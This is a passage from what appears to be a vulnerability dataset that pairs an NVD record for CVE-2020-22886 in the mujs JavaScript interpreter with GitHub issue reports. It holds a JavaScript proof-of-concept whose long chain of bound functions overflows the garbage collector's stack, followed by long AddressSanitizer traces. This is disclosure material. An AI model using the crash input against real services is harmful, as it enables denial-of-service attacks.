/home/node/xmujs/jsgc.c:78 #158 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #159 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #160 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #161 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #162 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #163 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #164 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #165 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #166 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #167 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #168 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #169 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #170 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #171 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #172 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #173 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #174 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #175 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #176 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #177 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #178 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #179 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #180 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #181 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #182 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #183 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #184 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #185 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #186 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #187 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #188 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #189 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #190 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #191 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #192 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #193 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #194 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #195 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #196 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #197 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #198 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #199 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #200 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #201 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #202 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #203 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #204 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #205 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #206 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #207 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #208 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #209 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #210 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #211 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #212 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #213 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #214 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #215 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #216 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #217 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #218 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #219 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #220 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #221 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #222 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #223 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #224 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #225 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #226 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #227 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #228 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #229 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #230 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #231 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #232 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #233 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #234 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #235 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #236 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #237 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #238 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #239 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #240 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #241 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #242 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #243 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #244 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #245 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #246 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #247 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #248 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #249 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #250 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #251 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 SUMMARY: AddressSanitizer: stack-overflow /home/node/xmujs/jsgc.c:76 jsG_markproperty ==16827==ABORTING ```
stack overflow
https://api.github.com/repos/ccxvii/mujs/issues/133/comments
4
2020-04-17T06:37:43Z
2020-05-27T10:37:46Z
https://github.com/ccxvii/mujs/issues/133
601,738,903
133
2,183
CVE-2020-22886
2021-07-13T15:15:08.647
Buffer overflow vulnerability in function jsG_markobject in jsgc.c in mujs before 1.0.8, allows remote attackers to cause a denial of service.
{ "cvssMetricV2": [ { "acInsufInfo": false, "baseSeverity": "MEDIUM", "cvssData": { "accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "PARTIAL", "baseScore": 5, "confidentialityImpact": "NONE", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:N/C:N/I:N/A:P", "version": "2.0" }, "exploitabilityScore": 10, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "source": "nvd@nist.gov", "type": "Primary", "userInteractionRequired": false } ], "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 3.9, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ccxvii/mujs/issues/134" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/ccxvii/mujs/issues/134" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:artifex:mujs:*:*:*:*:*:*:*:*", "matchCriteriaId": "1E4F4992-BAA1-423B-8E9C-6CEE738303B0", "versionEndExcluding": "1.0.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "120" ]
120
https://github.com/ccxvii/mujs/issues/134
[ "Exploit", "Third Party Advisory" ]
github.com
[ "ccxvii", "mujs" ]
# Enviroment ``` operating system: ubuntu18.04 compile command: make build=sanitize test command: ./mujs poc ``` # poc ``` /* est bound function chainnal implementation * to "collapse" bound funct /*=== F() bound foo object this-F string foo undefined undefined undefined undefined undefined undefined G() bound bound foo object this-F string foo string bar string quux unarg-52 53 string arg-53 54 string arg-54 55 string arg-55 56 string arg-56 57 string arg-57 58 string arg-58 59 string arg-59 60 string arg-60 61 string arg-61 62 string arg-62 63 string arg-63 64 string arg-64 65 string arg-65 66 string arg-66 67 string arg-67 68 string arg-68 69 string arg-69 70 string arg-70 71 string arg-71 72 string arg-72 73 string arg-73 74 string arg-74 75 string arg-75 76 string arg-76 77 string arg-77 78 string arg-78 79 string arg-79 80 string arg-80 81 string arg-81 82 string arg-82 83 string arg-83 84 string arg-84 85 string arg-85 86 string arg-86 87 string arg-87 88 string arg-88 89 string arg-89 90 string arg-90 91 string arg-91 92 string arg-92 93 string arg-93 94 string arg-94 95 string arg-95 96 string arg-96 97 string arg-97 98 string arg-98 99 string arg-99 ===*/ function test() { var func; var F, G, H, I; // Final function is an ECMAScript function. func = function foo(a, b, c, d) { print(typeof this, this); print(typeof a, a); print(typeof b, b); print(typeof c, c); print(typeof d, d); }; F = func.bind('this-F', 'foo'); G = F.bind('this-G', 'bar', 'quux'); H = G.bind('this-H', 'baz', 'quuux'); I = G.bind('this-I', 123, 234); // both H and I bind via G print('F()', F.name); F(); print('G()', G.name); G(); print('H()', H.name); H(); print('I()', I.name); I(); // Final function is a native function. func = Math.max; F = func.bind(null); G = F.bind(null, 3); H = G.bind(null, 4); I = H.bind(null, 5); print('F()', F.name); print(F()); print('G()', G.name); print(G()); print('H()', H.name); print(H()); print('I()', I.name); print(I()); // Lightfunc final target needs testing too; it is covered by Math.max() // if DUK_USE_LIGHTFUNC_BUILTINS is enabled. // Long chain. func = function foo() { print(typeof this, this); print(arguments.length); for (var i = 0; i < arguments.length; i++) { print(i, typeof arguments[i], arguments[i]); } }; for (var i = 0;!i < 100; i++) { func = func.bind('this-' + i, 'arg-' + i); } print(func.name); func(); } try { test(); } catch (e) { } ``` # vulnerability description: Poc will cause stack overflow. As shown below: ``` ASAN:SIGSEGV ================================================================= ==19628==ERROR: AddressSanitizer: stack-overflow on address 0x7ffd0fa89ff8 (pc 0x00000041ecf2 bp 0x7ffd0fa8a010 sp 0x7ffd0fa89ff0 T0) #0 0x41ecf1 in jsG_markproperty /home/node/xmujs/jsgc.c:76 #1 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #2 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #3 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #4 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #5 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #6 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #7 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #8 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #9 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #10 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #11 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #12 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #13 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #14 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #15 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #16 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #17 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #18 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #19 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #20 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #21 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #22 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #23 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #24 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #25 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #26 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #27 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #28 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #29 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #30 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #31 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #32 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #33 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #34 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #35 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #36 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #37 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #38 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #39 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #40 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #41 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #42 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #43 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #44 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #45 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #46 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #47 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #48 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #49 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #50 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #51 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #52 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #53 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #54 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #55 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #56 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #57 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #58 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #59 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #60 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #61 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #62 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #63 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #64 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #65 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #66 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #67 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #68 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #69 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #70 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #71 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #72 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #73 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #74 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #75 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #76 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #77 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #78 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #79 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #80 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #81 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #82 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #83 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #84 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #85 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #86 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #87 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #88 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #89 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #90 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #91 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #92 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #93 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #94 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #95 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #96 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #97 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #98 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #99 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #100 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #101 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #102 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #103 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #104 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #105 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #106 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #107 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #108 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #109 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #110 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #111 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #112 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #113 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #114 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #115 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #116 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #117 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #118 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #119 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #120 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #121 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #122 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #123 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #124 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #125 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #126 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #127 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #128 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #129 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #130 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #131 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #132 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #133 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #134 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #135 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #136 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #137 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #138 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #139 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #140 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #141 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #142 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #143 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #144 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #145 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #146 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #147 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #148 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #149 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #150 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #151 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #152 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #153 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #154 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #155 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #156 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #157 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #158 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #159 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #160 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #161 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #162 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #163 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #164 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #165 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #166 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #167 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #168 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #169 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #170 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #171 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #172 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #173 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #174 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #175 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #176 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #177 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #178 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #179 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #180 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #181 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #182 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #183 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #184 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #185 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #186 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #187 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #188 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #189 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #190 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #191 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #192 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #193 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #194 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #195 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #196 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #197 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #198 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #199 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #200 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #201 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #202 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #203 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #204 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #205 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #206 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #207 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #208 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #209 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #210 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #211 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #212 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #213 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #214 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #215 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #216 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #217 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #218 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #219 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #220 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #221 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #222 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #223 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #224 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #225 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #226 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #227 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #228 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #229 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #230 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #231 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #232 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #233 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #234 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #235 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #236 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #237 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #238 0x41ed74 in jsG_markproperty /home/node/xmujs/jsgc.c:77 #239 0x41edf3 in jsG_markproperty /home/node/xmujs/jsgc.c:78 #240 0x41f19b in jsG_markobject /home/node/xmujs/jsgc.c:94 #241 0x41efaf in jsG_markproperty /home/node/xmujs/jsgc.c:83 #242 0x41ed74 in jsG_markproperty 